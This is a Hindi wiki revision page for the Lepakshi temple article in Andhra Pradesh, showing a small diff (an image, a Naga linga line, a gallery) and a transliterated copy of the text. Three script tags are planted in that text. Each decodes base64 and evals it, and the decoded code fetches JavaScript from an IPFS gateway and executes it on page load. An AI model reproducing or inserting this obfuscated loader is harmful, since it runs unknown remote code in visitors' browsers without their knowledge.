Difference between revisions of "लेपाक्षी मंदिर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''लेपाक्षी''' आंध्र प्रदेश राज्य के [[अनं...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
 +
[[चित्र:Kalyana-Mantapa-Lepakshi.jpg|thumb|250px|कल्याण मंतापा, लेपाक्षी मंदिर]]
 
'''लेपाक्षी''' [[आंध्र प्रदेश]] राज्य के [[अनंतपुर]] में स्थित एक छोटा सा गांव है।  
 
'''लेपाक्षी''' [[आंध्र प्रदेश]] राज्य के [[अनंतपुर]] में स्थित एक छोटा सा गांव है।  
 
*यह गांव अपने कलात्‍मक मंदिरों के लिए जाना जाता है जिनका निर्माण 16वीं शताब्‍दी में किया गया था।  
 
*यह गांव अपने कलात्‍मक मंदिरों के लिए जाना जाता है जिनका निर्माण 16वीं शताब्‍दी में किया गया था।  
Line 5: Line 6:
 
*विशाल मंदिर परिसर में [[शिव|भगवान शिव]], [[विष्णु|भगवान विष्‍णु]] और भगवान वीरभद्र को समर्पित तीन मंदिर हैं।  
 
*विशाल मंदिर परिसर में [[शिव|भगवान शिव]], [[विष्णु|भगवान विष्‍णु]] और भगवान वीरभद्र को समर्पित तीन मंदिर हैं।  
 
*भगवान शिव नायक शासकों के कुलदेवता थे।  
 
*भगवान शिव नायक शासकों के कुलदेवता थे।  
 +
*लिपाक्षी मंदिर में नागलिंग के संभवत: सबसे बड़ी प्रतिमा स्‍थापित है।
 
*[[गणेश|भगवान गणेश]] की मूर्ति भी यहाँ आने वाले सैलानियों का ध्‍यान आकर्षित करती है।  
 
*[[गणेश|भगवान गणेश]] की मूर्ति भी यहाँ आने वाले सैलानियों का ध्‍यान आकर्षित करती है।  
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Lepakshi-Lingam.jpg|नागलिंग, लेपाक्षी मंदिर
 +
चित्र:Lepakshi-Temple.jpg|वीरभद्र मंदिर, लेपाक्षी
 +
चित्र:Nandi-Lepakshi-Temple.jpg| [[नंदी]], लेपाक्षी मंदिर
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 20: Line 28:
  
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 10:10, 26 July 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|250px|kalyan mantapa, lepakshi mandir lepakshi aandhr pradesh rajy ke anantapur mean sthit ek chhota sa gaanv hai.

  • yah gaanv apane kalath‍mak mandiroan ke lie jana jata hai jinaka nirman 16vian shatabh‍di mean kiya gaya tha.
  • vijayanagar shaili ke mandiroan ka suandar udaharan 'lipakshi mandir' hai.
  • vishal mandir parisar mean bhagavan shiv, bhagavan vishh‍nu aur bhagavan virabhadr ko samarpit tin mandir haian.
  • bhagavan shiv nayak shasakoan ke kuladevata the.
  • lipakshi mandir mean nagaliang ke sanbhavat: sabase b di pratima sh‍thapit hai.
  • bhagavan ganesh ki moorti bhi yahaan ane vale sailaniyoan ka dhh‍yan akarshit karati hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>